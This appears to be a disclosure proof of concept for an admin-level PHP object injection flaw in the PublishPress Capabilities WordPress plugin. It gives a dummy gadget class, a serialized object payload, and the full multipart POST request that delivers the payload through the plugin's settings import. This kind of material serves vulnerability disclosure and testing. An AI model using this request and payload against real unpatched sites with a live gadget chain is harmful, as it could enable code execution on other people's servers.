PublishPress Capabilities < 2.5.2 - Admin+ PHP Objection Injection

Proof of Concept

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named settings.json with the following content and import if: O:4:"Evil":0:{};

POST /wp-admin/admin.php?page=pp-capabilities-backup HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=pp-capabilities-backup
Content-Type: multipart/form-data; boundary=---------------------------293588204025713533762090348603
Content-Length: 1198
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="_wpnonce"

9ca77a826e
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin.php?page=pp-capabilities-backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"

user_roles
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"

capsman_editor_features_backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"

capsman_admin_features_backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="import_file"; filename="capabilities-export-2022-09-27_3-28-28_am.json"
Content-Type: application/json

O:4:"Evil":0:{};
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="import_backup"

Import
-----------------------------293588204025713533762090348603--